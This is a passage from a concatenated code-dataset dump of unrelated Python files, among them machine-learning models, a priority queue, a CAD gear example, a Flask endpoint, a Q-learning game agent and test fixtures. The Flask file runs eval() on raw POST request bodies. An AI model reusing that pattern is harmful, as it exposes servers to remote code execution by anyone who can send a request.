semi-supervised learning and unsupervised learning.\r\n\r\n Parameters:\r\n ----------\r\n graph: Graph or MultiGraph.\r\n device: string. optional\r\n The device where the model running on.\r\n seed: interger scalar. optional\r\n Used in combination with `tf.random.set_seed` & `np.random.seed`\r\n & `random.seed` to create a reproducible sequence of tensors\r\n across multiple calls.\r\n name: string. optional\r\n Specified name for the model. (default: :str: `class.__name__`)\r\n kwargs: other customed keyword Parameters.\r\n\r\n \"\"\"\r\n graph = parse_graph_inputs(*graph)\r\n self.backend = backend()\r\n self.kind = self.backend.kind\r\n\r\n if kwargs.pop('check', True):\r\n _check_cur_module(self.__module__, self.kind)\r\n\r\n _id = np.random.RandomState(None).randint(100)\r\n\r\n raise_if_kwargs(kwargs)\r\n\r\n if seed is not None:\r\n np.random.seed(seed)\r\n random.seed(seed)\r\n if self.kind == \"P\":\r\n torch.manual_seed(seed)\r\n torch.cuda.manual_seed(seed)\r\n# torch.cuda.manual_seed_all(seed)\r\n else:\r\n tf.random.set_seed(seed)\r\n\r\n if name is None:\r\n name = self.__class__.__name__\r\n\r\n self.graph = graph.copy()\r\n self.seed = seed\r\n self.name = name\r\n self.device = parse_device(device, self.kind)\r\n self.idx_train = None\r\n self.idx_val = None\r\n self.idx_test = None\r\n self.backup = None\r\n\r\n self._model = None\r\n self._custom_objects = None # used for save/load TF model\r\n\r\n # log path\r\n # add random integer to avoid duplication\r\n self.weight_path = osp.join(osp.expanduser(osp.normpath(\"/tmp/weight\")),\r\n f\"{name}_{_id}_weights\")\r\n\r\n # data types, default: `float32` and `int32`\r\n self.floatx = floatx()\r\n self.intx = intx()\r\n\r\n def save(self, path=None, as_model=False, overwrite=True, save_format=None, **kwargs):\r\n\r\n if not path:\r\n path = self.weight_path\r\n\r\n makedirs_from_path(path)\r\n\r\n if as_model:\r\n if self.kind == \"T\":\r\n save.save_tf_model(self.model, path, overwrite=overwrite, save_format=save_format, **kwargs)\r\n else:\r\n save.save_torch_model(self.model, path, overwrite=overwrite, save_format=save_format, **kwargs)\r\n else:\r\n if self.kind == \"T\":\r\n save.save_tf_weights(self.model, path, overwrite=overwrite, save_format=save_format)\r\n else:\r\n save.save_torch_weights(self.model, path, overwrite=overwrite, save_format=save_format)\r\n\r\n def load(self, path=None, as_model=False):\r\n if not path:\r\n path = self.weight_path\r\n\r\n if as_model:\r\n if self.kind == \"T\":\r\n self.model = save.load_tf_model(\r\n path, custom_objects=self.custom_objects)\r\n else:\r\n self.model = save.load_torch_model(path)\r\n else:\r\n if self.kind == \"T\":\r\n save.load_tf_weights(self.model, path)\r\n else:\r\n save.load_torch_weights(self.model, path)\r\n\r\n def __getattr__(self, attr):\r\n ##### TODO: This may cause ERROR ######\r\n try:\r\n return self.__dict__[attr]\r\n except KeyError:\r\n if hasattr(self, \"_model\") and hasattr(self._model, attr):\r\n return getattr(self._model, attr)\r\n raise AttributeError(\r\n f\"'{self.name}' and '{self.name}.model' objects have no attribute '{attr}'\")\r\n\r\n @property\r\n def model(self):\r\n return self._model\r\n\r\n @model.setter\r\n def model(self, m):\r\n # Back up\r\n if isinstance(m, tf.keras.Model) and m.weights:\r\n self.backup = tf.identity_n(m.weights)\r\n # assert m is None or isinstance(m, tf.keras.Model) or torch.nn.Module\r\n self._model = m\r\n\r\n @property\r\n def custom_objects(self):\r\n return self._custom_objects\r\n\r\n @custom_objects.setter\r\n def custom_objects(self, value):\r\n assert isinstance(value, dict)\r\n self._custom_objects = value\r\n\r\n @property\r\n def close(self):\r\n \"\"\"Close the session of model and set `built` to False.\"\"\"\r\n K.clear_session()\r\n self.model = None\r\n\r\n def __call__(self, *args, **kwargs):\r\n return self._model(*args, **kwargs)\r\n\r\n def __repr__(self):\r\n return f\"GraphGallery.nn.{self.name}(device={self.device}, backend={self.backend})\"\r\n","sub_path":"graphgallery/nn/models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":7585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"458043459","text":"class Solution(object):\r\n def decodeString(self, s):\r\n \"\"\"\r\n :type s: str\r\n :rtype: str\r\n \"\"\"\r\n ans = []\r\n stack = [[\"\",1]]\r\n num = \"\"\r\n \r\n for char in s:\r\n if char.isdigit():\r\n num += char\r\n elif char == \"[\":\r\n stack.append([\"\",int(num)])\r\n num = \"\"\r\n elif char == \"]\":\r\n string,k = stack.pop()\r\n stack[-1][0] += string*k\r\n elif char.isalpha():\r\n stack[-1][0] += char\r\n \r\n #print(stack)\r\n return stack[0][0]\r\n\r\nif __name__ == '__main__':\r\n test = Solution()\r\n print(test.decodeString(\"32[a53[beg]]3[ag]\"))\r\n","sub_path":"decodeString.py","file_name":"decodeString.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"651811469","text":"class ipq:\n def __init__(self, d):\n self.tree = []\n self.d = d\n self.prt = []\n self.pos = []\n\n def get_size(self):\n return len(self.tree)\n\n def insert(self, key, p):\n self.tree.append(key)\n if len(self.pos) > key:\n self.pos[key] = self.get_size() - 1\n else:\n while len(self.pos) < key:\n self.pos.append(None)\n self.pos.append(self.get_size()-1)\n if len(self.prt) > key:\n self.prt[key] = p\n else:\n while len(self.prt) < key:\n self.prt.append(None)\n self.prt.append(p)\n self.bubbleup(self.get_size()-1)\n\n def bubbleup(self, i):\n if i <= 0:\n return\n p = (i-1)//self.d\n if self.prt[self.tree[p]] > self.prt[self.tree[i]]:\n self.swap(i, p)\n self.bubbleup(p)\n\n def swap(self, i, j):\n self.tree[i], self.tree[j] = self.tree[j], self.tree[i]\n self.pos[self.tree[i]], self.pos[self.tree[j]] = self.pos[self.tree[j]], self.pos[self.tree[i]]\n\n def poll(self):\n if self.get_size() == 0:\n return None\n if self.get_size() == 1:\n return self.tree.pop()\n z = self.tree[0]\n self.tree[0] = self.tree.pop()\n self.pos[self.tree[0]] = 0\n self.bubbledown(0)\n return z\n\n def bubbledown(self, i):\n minimum = i\n for j in range(self.d):\n child = i*self.d + j + 1\n if child < self.get_size() and self.prt[self.tree[child]] < self.prt[self.tree[minimum]]:\n minimum = child\n if i != minimum:\n self.swap(i, minimum)\n self.bubbledown(minimum)\n\n def decreasepri(self, key, np):\n if len(self.prt) <= key or self.prt[key] < np:\n return\n self.prt[key] = np\n self.bubbleup(self.pos[key])\n","sub_path":"algorithms and ds/graph_algorithms/indexed_d_ary_priority_q.py","file_name":"indexed_d_ary_priority_q.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"340225307","text":"import cadquery as cq\nimport cadquery.plugins.cq_driveline.cq_gears as cq_gears\n\n\n# Create a gear by specifying gear parameters\n# Must specify: teeth, module and faceWidth\n# Other parameters are optional\n# Note - this does not create any geometry\nGearA = cq_gears.cylindricalGear(\n teeth=29,\n module=1.5,\n faceWidth=10.0,\n pressureAngle=15.0,\n helixAngle=30.0,\n profileShift=0.35,\n addendumMod=0.25,\n dedendumMod=-0.2,\n rootFillet=0.75,\n tipChamfer=0.1,\n)\n\n\n# For gears to mesh, their module & pressure angles must match\n# Helix angle must be equal & opposite for helical gears\n# For spur gears set helixAngle to zero (default)\nGearB = cq_gears.cylindricalGear(\n teeth=53,\n module=GearA.module,\n faceWidth=10.0,\n pressureAngle=GearA.pressureAngle,\n helixAngle=-GearA.helixAngle,\n profileShift=0.0,\n addendumMod=0.5,\n dedendumMod=0.1,\n rootFillet=0.75,\n tipChamfer=0.1,\n)\n\n\n# The .mesh() function modifies the gear so that it meshes with\n# the specified gear at a specified centreDistance and backlash\n# If no centreDistance is specified, it is calculated\n# Otherwise, the parameter specified by the \"modify\" value is adjusted\n# This can currently be set to either \"profileShift\" or \"module\"\n# Any modifications are currently printed to console\n# centreDistance and relativeRotation are returned to help positioning later\ncd, relativeRotation = GearB.mesh(\n Gear=GearA, centreDistance=62.0, backlash=0.2, modify=\"profileShift\"\n)\n\n\n# Here we set up rotations so the gears mesh nicely\nrotationA = 0.0\nratio = GearB.teeth / GearA.teeth\nrotationB = relativeRotation - rotationA / ratio\n\n\n# To create the 3D model, you can call Gear.create3D()\n# In this case we pass a transformed workplane so the gears mesh nicely\n# It returns a workplane as with any other cadquery workplane function,\n# so you can continue adding features. In this case adding a hole and\n# chamfering both ends\nresultA = (\n GearA.create3D(\n workplane=cq.Workplane(\"XY\").transformed(\n offset=cq.Vector(0, 0, 0), rotate=cq.Vector(0, 0, rotationA)\n ),\n flankSplinePoints=4,\n )\n .faces(\">Z\")\n .hole(12.0)\n .faces(cq.selectors.NearestToPointSelector((0, 0, GearA.faceWidth / 2)))\n .edges()\n .chamfer(0.5)\n)\n\nresultB = (\n GearB.create3D(\n workplane=cq.Workplane(\"XY\").transformed(\n offset=cq.Vector(cd, 0, 0), rotate=cq.Vector(0, 0, rotationB)\n ),\n flankSplinePoints=4,\n )\n .faces(\">Z\")\n .hole(12.0)\n .faces(cq.selectors.NearestToPointSelector((cd, 0, GearA.faceWidth / 2)))\n .edges()\n .chamfer(0.5)\n)\n","sub_path":"Examples/cq_gears_example.py","file_name":"cq_gears_example.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"324211328","text":"\n#import the libraries\nimport numpy as np\nimport pandas as pd\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom sklearn.metrics import classification_report\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler, Imputer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_selection import SelectPercentile\nfrom sklearn.grid_search import GridSearchCV \n\n# Read data\ntest = pd.read_csv('../data/test.csv',header=0)\ntrain = pd.read_csv('../data/train.csv',header=0)\n\ndef combine_data():\n combined = train.append(test)\n combined.reset_index(inplace=True)\n combined.drop('index',inplace=True,axis=1)\n return combined\n\ndef prep_features(df):\n \n # embarked -> dummied\n df = df.join(pd.get_dummies(df['Embarked'].fillna('S').map(lambda x: x[0]),prefix='embarked', drop_first=True)) \n \n # gender -> dummied\n df['Gender'] = df['Sex'].map({'female': 0, 'male': 1}).astype(int)\n \n # Pclass -> dummied\n df = df.join(pd.get_dummies(df['Pclass'],prefix='Pclass', drop_first=True))\n \n # Cabin -> dummied\n df = df.join(pd.get_dummies(df['Cabin'].fillna('U').map(lambda x: x[0]),prefix='Cabin',drop_first=True))\n \n #########################\n ## Feature Engineering ##\n #########################\n \n # map name -> title\n df['Title'] = df['Name'].map(lambda name:name.split(',')[1].split('.')[0].strip())\n Title_Dictionary = {\n \"Capt\": \"Officer\",\n \"Col\": \"Officer\",\n \"Major\": \"Officer\",\n \"Jonkheer\": \"Royalty\",\n \"Don\": \"Royalty\",\n \"Sir\" : \"Royalty\",\n \"Dr\": \"Officer\",\n \"Rev\": \"Officer\",\n \"the Countess\":\"Royalty\",\n \"Dona\": \"Royalty\",\n \"Mme\": \"Mrs\",\n \"Mlle\": \"Miss\",\n \"Ms\": \"Mrs\",\n \"Mr\" : \"Mr\",\n \"Mrs\" : \"Mrs\",\n \"Miss\" : \"Miss\",\n \"Master\" : \"Master\",\n \"Lady\" : \"Royalty\"\n }\n df = df.join(pd.get_dummies(df['Title'].map(Title_Dictionary),prefix='Title',drop_first=True))\n \n # Age Range\n df['Age'] = df.groupby(['Sex','Pclass','Title'])['Age'].transform(lambda x: x.fillna(x.median()))\n df = df.join(pd.get_dummies(pd.cut(df['Age'], 8),prefix='age_group', drop_first=True))\n \n # Family Size\n df = df.join(pd.get_dummies(df['SibSp'] + df['Parch'],prefix='family_size', drop_first=True))\n \n # Impute Fare\n df['Fare'].fillna(df['Fare'].mean(),inplace=True)\n \n # Fare per person\n df['fare_per_person'] = df['Fare'] / (df['SibSp'] + df['Parch'] + 1)\n \n del df['Name']\n del df['Sex']\n del df['Title']\n del df['Pclass']\n del df['Ticket']\n del df['Embarked'] \n del df['Cabin']\n \n return df\n\ndef make_predictions():\n \n df = combine_data()\n df = prep_features(df)\n \n train = df.ix[0:890]\n test = df.ix[891:]\n \n y_train = train.pop('Survived')\n X_train = train\n X_test = test.drop('Survived', axis=1, inplace=True)\n \n clf = Pipeline([\n ('impute', Imputer(strategy='median')),\n ('model', RandomForestClassifier(n_jobs=-1))\n ])\n\n params = {\n 'model__n_estimators': [200,220,240],\n 'model__max_depth' : [4,6,8,10],\n 'model__criterion': ['gini','entropy']\n }\n\n grid = GridSearchCV(clf, params, cv=10, scoring='roc_auc')\n grid.fit(X_train, y_train)\n \n pd.DataFrame({'PassengerId':test['PassengerId'],\n 'Survived' : grid.predict(test).astype(int)}).to_csv('../data/output.csv',index=False)\n\nif __name__ == \"__main__\":\n make_predictions()\n\n\n\n","sub_path":"Titanic/script/titanic_kaggle.py","file_name":"titanic_kaggle.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"411342686","text":"\nfrom flask import Blueprint, request, make_response, jsonify\n\nfrom app.utils.AnalysisOwlUtils import AnalysisOwlUtils\n\naskfor=Blueprint('askfor',__name__)\n\n\n@askfor.route('/ask/new')\ndef ask():\n return 'new!!!!'\n\n\n\n@askfor.route('/ask',methods=['GET','POST'])\ndef server_ask():\n if request.method == 'POST':\n obj=eval(request.data.decode(encoding = \"utf-8\")) #eval()将str变为dict\n # print(obj['text'])\n comment = AnalysisOwlUtils.getClassComent('ontolo_classes', 'OCname', obj['text'])\n if comment:\n response = make_response(jsonify(comment))\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'\n response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'\n return response\n else:\n return jsonify('没有找到相关回答')","sub_path":"app/api/askfor.py","file_name":"askfor.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"553683221","text":"# -*- coding: utf-8 -*-\n#_author_='zichao';\n#date: 11/13/19 9:52\nimport torch\nimport torch.nn as nn\nfrom models.resnet import BasicBlock\n\nclass Conv(nn.Module):\n def __init__(self, in_planes, planes, kernel_size, stride, padding):\n super(Conv, self).__init__()\n self.conv = nn.Conv2d(in_planes, planes, kernel_size=kernel_size, stride=stride, padding=padding, bias=False).cuda()\n self.eps = torch.FloatTensor([0.001]).cuda()\n\n def forward(self, input, grad):\n adv = self.eps * grad.sign()\n new_input = input + adv\n new_output = self.conv(new_input)\n\n return new_output\n\nclass Conv1(nn.Module):\n def __init__(self, in_planes, planes, kernel_size, stride, padding):\n super(Conv1, self).__init__()\n self.conv = nn.Conv2d(in_planes, planes, kernel_size=kernel_size, stride=stride, padding=padding, bias=False).cuda()\n self.eps = torch.FloatTensor([0.01]).cuda()\n\n def forward(self, input, grad):\n adv = self.eps * grad.sign()\n new_input = input + adv\n new_output = self.conv(new_input)\n\n return new_output\n\n# class Small_group(nn.Module):\n# def __init__(self, in_planes, planes, kernel_size, stride, padding):\n# super(Small_group, self).__init__()\n# self.conv = nn.Conv2d(in_planes, planes, kernel_size=kernel_size, stride=stride, padding=padding, bias=False).cuda()\n# self.eps = torch.FloatTensor([0.01]).cuda()\n# self.bn =\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"3x3 convolution with padding\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\nclass BasicGroup(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicGroup, self).__init__()\n self.conv_1 = conv3x3(inplanes, planes, stride)\n self.bn_1 = nn.BatchNorm2d(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv_2 = conv3x3(planes, planes)\n self.bn_2 = nn.BatchNorm2d(planes)\n self.downsample = downsample\n self.stride = stride\n self.eps = torch.FloatTensor([0.0001]).cuda()\n\n def forward(self, x, grad):\n residual = x\n x = x + self.eps * grad.sign()\n out = self.conv_1(x)\n out = self.bn_1(out)\n out = self.relu(out)\n\n out = self.conv_2(out)\n out = self.bn_2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n # out = self.relu(out)\n\n return out\n\nclass Layer_loss(nn.Module):\n def __init__(self):\n super(Layer_loss, self).__init__()\n def forward(self, ori_output, new_output, grad):\n loss = (new_output - ori_output).view(-1).dot(grad.contiguous().view(-1))\n return loss\n\n\ndef update_grad(model, layer_inputs, layer_outputs, grad_inputs, grad_outputs, layers, crit, lam):\n index = 0\n layer_loss = 0\n for p in model.modules():\n if isinstance(p, nn.Conv2d):\n # in_planes = p.in_channels\n # planes = p.out_channels\n # kernel_size = p.kernel_size[0]\n # padding = p.padding[0]\n # stride = p.stride[0]\n #\n # layer = Conv(in_planes, planes, kernel_size, stride,padding)\n\n layer = layers[index]\n layer.conv.load_state_dict(p.state_dict())\n layer.zero_grad()\n layer_input = layer_inputs[index]\n layer_output = layer_outputs[index]\n grad_input = grad_inputs[32- index]\n grad_output = grad_outputs[32 - index]\n new_output = layer(layer_input, grad_input)\n # crit = Layer_loss()\n loss = crit(layer_output, new_output, grad_output)\n # loss.backward()\n layer_loss +=loss\n index += 1\n # if index > 0:\n loss_index = 0\n layer_loss = layer_loss/(index + 1)\n layer_loss.backward()\n for p in model.modules():\n if isinstance(p, nn.Conv2d):\n layer =layers[loss_index]\n p.weight.grad = lam * p.weight.grad + (1-lam) * layer.conv.weight.grad\n loss_index += 1\n\n return layer_loss\n\ndef group_noise(model, groups, crit, alpha):\n index = 0\n layer_loss = 0\n for p in model.modules():\n if isinstance(p, BasicBlock):\n group = groups[index]\n group.load_state_dict(p.state_dict())\n group.zero_grad()\n # if index > 0 and index%5 == 0 :\n # group.eps *= mults\n group_input = p.info['input']\n group_output = p.info['output']\n grad_input = p.info['input_grad']\n grad_output = p.info['output_grad']\n new_output = group(group_input, grad_input)\n loss = crit(group_output, new_output, grad_output)\n\n loss = loss/len(groups)\n loss.backward()\n\n # for para in p.parameters():\n # print('yes')\n p.conv_1.weight.grad = alpha * p.conv_1.weight.grad + (1 - alpha) * group.conv_1.weight.grad\n p.conv_2.weight.grad = alpha * p.conv_2.weight.grad + (1 - alpha) * group.conv_2.weight.grad\n\n layer_loss += loss.item()\n index +=1\n\n return layer_loss\n","sub_path":"update_noise.py","file_name":"update_noise.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"21551171","text":"from yolapy.services import Yola\n\n\nclass Subscription(object):\n\n \"\"\"Construct a Subscription.\n\n :param id: Str, 32 char ID\n :param created_at: Str, creation time\n :param updated_at: Str, last update time\n :param partner_id: Str, ID of the partner\n :param user_id: Str, 32 character ID of the owner\n :param status: Str\n :param term: Str\n :param sku: Str, SKU of the related product\n :param type: Str,\n :param start_date: Str\n :param expiry_date: Str\n :param billing_date: Str\n :param deprovision_date: Str\n :param auto_renew: Bool\n :param properties: Dict\n\n :return: Subscription\n :rtype: yolapy.models.Subscription\n\n \"\"\"\n\n _fields = (\n 'id', 'created_at', 'updated_at', 'partner_id', 'user_id', 'status',\n 'term', 'sku', 'type', 'start_date', 'expiry_date', 'billing_date',\n 'deprovision_date', 'auto_renew', 'properties')\n\n def __init__(self, **fields):\n self.client = Yola()\n for field_name in self._fields:\n setattr(self, field_name, fields.get(field_name))\n\n @classmethod\n def list(cls, **kwargs):\n \"\"\"Return a filtered list of Subscriptions.\n\n Usage::\n\n >>> from yolapy.models import Subscription\n >>> user_id = 'abcdef1234567890abcdef1234567890'\n >>> user_subs = Subscription.list(user_id=user_id)\n >>> print user_subs[0]\n \n >>> print user_subs[0].user_id\n u'abcdef1234567890abcdef1234567890'\n \"\"\"\n response = Yola().list_subscriptions(**kwargs)\n return [cls(**sub) for sub in response['results']]\n","sub_path":"yolapy/models/subscription.py","file_name":"subscription.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"468130522","text":"# This is necessary to find the main code\nimport math\nimport sys\nfrom state import State\nimport numpy as np\nimport random\n\nsys.path.insert(0, '../bomberman')\n# Import necessary stuff\nfrom entity import CharacterEntity\nfrom colorama import Fore, Back\nimport pickle\nimport os\n\n\nclass Qlearning:\n\n def __init__(self, total_reward, filename=\"../lessons.p\"):\n self.total_reward = total_reward\n self.alpha = 0.05\n self.gamma = 0.9\n self.default_reward = 0\n self.filename = filename\n\n if os.path.exists(filename):\n file = open(filename, 'rb')\n self.Q = pickle.load(file)\n file.close()\n else:\n self.Q = {}\n\n def step(self, state, eps=0.15):\n \"\"\"\n Steps through one state\n \"\"\"\n if state not in self.Q:\n self.Q[state] = {action: self.default_reward for action in self.all_actions(state)}\n\n if np.random.uniform() < eps:\n act = self.sample(state)\n else:\n act = self.max_for_state(state)[0]\n print(f\"State: {state} Act: {act} Score: {self.Q[state][act]}\")\n opts = self.Q[state]\n return act\n\n def save_outcome(self, action, new_state, old_state, reward):\n \"\"\"\n Saves the action\n \"\"\"\n a1, max_q_s1a1 = self.max_for_state(new_state)\n self.Q[old_state][action] = self.alpha * (reward + self.gamma * max_q_s1a1) + (1 - self.alpha) * self.Q[old_state][action]\n\n file = open(self.filename, 'wb')\n pickle.dump(self.Q, file)\n file.close()\n\n def sample(self, state):\n \"\"\"\n Gets random move\n \"\"\"\n return random.choice(self.possible_actions(state))\n\n @staticmethod\n def possible_actions(state):\n \"\"\"\n gets all possible actions\n \"\"\"\n moves = state.valid_moves\n arr = []\n for move in moves:\n if not state.bomb_placed:\n arr.append((move, True))\n arr.append((move, False))\n return arr\n\n @staticmethod\n def all_actions(state):\n \"\"\"\n gets all possible actions\n \"\"\"\n moves = [(x, y) for x in range(- 1, 2) for y in range(- 1, 2)]\n arr = []\n for move in moves:\n if not state.bomb_placed:\n arr.append((move, True))\n arr.append((move, False))\n return arr\n\n def max_for_state(self, state):\n \"\"\"\n Gets the maximum dictionary\n \"\"\"\n if state not in self.Q:\n self.Q[state] = {action: self.default_reward for action in self.all_actions(state)}\n\n d = self.Q[state]\n options = self.possible_actions(state)\n\n max_v = float('-inf')\n for key, val in d.items():\n if key in options and val > max_v:\n max_v = val\n max_key = key\n return max_key, max_v\n","sub_path":"Bomberman/groupNN/qlearning.py","file_name":"qlearning.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"386655893","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport re\nimport cgi\nimport urllib\nfrom services.exceptions import *\nfrom google.appengine.ext import db\nfrom services.tools import *\n\nclass TemporaryWarehouse(db.Model):\n\tautoId = db.IntegerProperty(required=False, default=0)\n\teventId = db.IntegerProperty(required=True)\n\tname = db.StringProperty(required=True)\n\tresponsable = db.StringProperty(required=False)\n\tlatitude = db.FloatProperty(required=False)\n\tlongitude = db.FloatProperty(required=False)\n\tlocationName = db.StringProperty(required=False)\n\taddress = db.StringProperty(required=False)\n\tstateWarehouse = db.StringProperty(required=False)\n\tcreatedDate = db.DateTimeProperty(required=False)\n\tcompanyId = db.IntegerProperty(required=False)\n\tisActive = db.BooleanProperty(required=False)\n\n\tdef toDict(self):\n\t\tidVal = {\"id\":str(self.key().id())}\n\t\tobjDic = dict([(p, unicode(getattr(self, p))) for p in self.properties()])\n\t\tobjDic.update(idVal)\n\t\treturn objDic\n\n\tdef toDictFront(self):\n\t\tobjDic={}\n\t\tobjDic[\"id\"]=str(self.key().id())\n\t\tobjDic[\"autoId\"]=str(self.autoId)\n\t\tif self.eventId is not None:\n\t\t\tobjDic[\"eventId\"]=str(self.eventId)\n\t\tif self.name is not None:\n\t\t\tobjDic[\"name\"]=self.name\n\t\tif self.responsable is not None:\n\t\t\tobjDic[\"responsable\"]=self.responsable\n\t\tif self.latitude is not None:\n\t\t\tobjDic[\"latitude\"]=self.latitude\n\t\tif self.longitude is not None:\n\t\t\tobjDic[\"longitude\"]=self.longitude\n\t\tif self.locationName is not None:\n\t\t\tobjDic[\"locationName\"]=self.locationName\n\t\tif self.isActive is not None:\n\t\t\tobjDic[\"isActive\"]=self.isActive\n\t\treturn objDic\n\n\tdef toDictReduced(self):\n\t\tobjDic={}\n\t\tobjDic[\"id\"]=str(self.key().id())\n\t\tobjDic[\"autoId\"]=str(self.autoId)\n\t\tif self.eventId is not None:\n\t\t\tobjDic[\"eventId\"]=str(self.eventId)\n\t\tif self.name is not None:\n\t\t\tobjDic[\"name\"]=self.name\n\t\tif self.responsable is not None:\n\t\t\tobjDic[\"responsable\"]=self.responsable\n\t\tif self.latitude is not None:\n\t\t\tobjDic[\"latitude\"]=self.latitude\n\t\tif self.longitude is not None:\n\t\t\tobjDic[\"longitude\"]=self.longitude\n\t\tif self.locationName is not None:\n\t\t\tobjDic[\"locationName\"]=self.locationName\n\t\tif self.isActive is not None:\n\t\t\tobjDic[\"isActive\"]=self.isActive\n\t\treturn objDic\n\n'''\neventId, name, responsable, latitude, longitude, locationName, stateWarehouse, isActive\n\neventId=eventId, name=name, responsable=responsable, latitude=latitude, longitude=longitude, locationName=locationName, stateWarehouse=stateWarehouse, createdDate=createdDate, isActive=isActive\n\neventId\nname\nresponsable\nlatitude\nlongitude\nlocationName\nstateWarehouse\nisActive\n\n'''","sub_path":"services/models/temporaryWarehouseModel.py","file_name":"temporaryWarehouseModel.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"190205389","text":"import numpy as np\nimport pandas as pd\n\nfrom astropy.table import Table\nfrom pkg_resources import resource_exists, resource_filename\nfrom air2vac import air2vac\n\n\n# resource_filename('desispec', 'data/emlines.par') \nfname = '/global/homes/m/mjwilson/desi/DX2DROPOUT/emlines.par'\n\n## http://www.sdss3.org/svn//repo/idlspec2d/trunk/etc/emlines.par\nlines = pd.read_csv(fname, sep='\\s+', skiprows=16, names=['LINEID', 'WAVELENGTH', 'NAME', 'REDSHIFT GROUP', 'WIDTH GROUP', 'FLUX GROUP', 'SCALE FACTOR'], comment='#')\nlines['INDEX'] = np.arange(len(lines))\nlines['GROUP'] = lines.groupby(['REDSHIFT GROUP', 'WIDTH GROUP']).ngroup()\nlines['DOUBLET'] = np.zeros(len(lines), dtype=np.int) - 99\nlines['WAVELENGTH'] = air2vac(lines['WAVELENGTH'])\n\nprint('\\n\\n** Converting to vacuum wavelengths. ** \\n\\n')\n\nlines = Table(lines.to_numpy(), names=lines.columns)\n\nfor i, x in enumerate([[6, 7], [16, 17], [25, 27]]):\n for y in x:\n lines['DOUBLET'][y] = i\n\nlines['LINERATIO'] = 0.0\nlines['LINERATIO'][6] = 0.7\nlines['LINERATIO'][7] = 0.7\nlines['LINERATIO'][16] = 0.7\nlines['LINERATIO'][17] = 0.7\n\nlines['MASKED'] = np.zeros(len(lines), dtype=np.int)\n\n# Ignored in chi sq. and not plotted; 4, 5, 8, 13, 14.\nfor x in [2, 5, 25, 27, 30, 8, 14]:\n lines['MASKED'][x] = 1\n\n# Balmer.\n# for x in [11, 12, 15]:\n# lines['MASKED'][x] = 1\n\n# lines = lines[lines['MASKED'] == 0]\n\nugroups, ugroupcnts = np.unique(lines['GROUP'][lines['MASKED'] == 0].data, return_counts=True)\n\n## ---- OII wavelengths ----\n## lines.loc[6,'WAVELENGTH'] \n## lines.loc[7,'WAVELENGTH']\n\nif __name__ == '__main__':\n lineids = np.arange(len(lines))\n\n singlets = lines[lineids][lines['DOUBLET'][lineids] == -99]\n doublets = lines[lineids][lines['DOUBLET'][lineids] >= 0]\n\n nsinglet = len(singlets)\n ndoublet = np.int(len(doublets) / 2)\n\n print()\n print('n singlets: {}, n doulets: {}'.format(nsinglet, ndoublet))\n print()\n print('unique groups: {}, counts: {}'.format(ugroups, ugroupcnts))\n print()\n print(singlets)\n print()\n print(doublets)\n print('\\n\\n')\n","sub_path":"lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"172450009","text":"#\n# Copyright (c) 2023 Airbyte, Inc., all rights reserved.\n#\n\nimport json\n\nimport pytest\nimport requests\nimport responses\nfrom airbyte_cdk.models import SyncMode\nfrom jsonschema import validate\nfrom source_amazon_ads import SourceAmazonAds\n\n\ndef setup_responses(\n profiles_response=None,\n attribution_report_response=None,\n):\n responses.add(\n responses.POST,\n \"https://api.amazon.com/auth/o2/token\",\n json={\"access_token\": \"alala\", \"expires_in\": 10},\n )\n if profiles_response:\n responses.add(\n responses.GET,\n \"https://advertising-api.amazon.com/v2/profiles\",\n body=profiles_response,\n )\n if attribution_report_response:\n responses.add(\n responses.POST,\n \"https://advertising-api.amazon.com/attribution/report\",\n body=attribution_report_response,\n )\n\n\ndef get_all_stream_records(stream):\n records = stream.read_records(SyncMode.full_refresh)\n return [r for r in records]\n\n\ndef get_stream_by_name(streams, stream_name):\n for stream in streams:\n if stream.name == stream_name:\n return stream\n raise Exception(f\"Expected stream {stream_name} not found\")\n\n\n@pytest.mark.parametrize(\n (\"stream_name\", \"report_type\"),\n [\n (\"attribution_report_products\", \"PRODUCTS\"),\n (\"attribution_report_performance_adgroup\", \"PERFORMANCE_ADGROUP\"),\n (\"attribution_report_performance_campaign\", \"PERFORMANCE_CAMPAIGN\"),\n (\"attribution_report_performance_creative\", \"PERFORMANCE_CREATIVE\"),\n ],\n)\n@responses.activate\ndef test_attribution_report_schema(config, profiles_response, 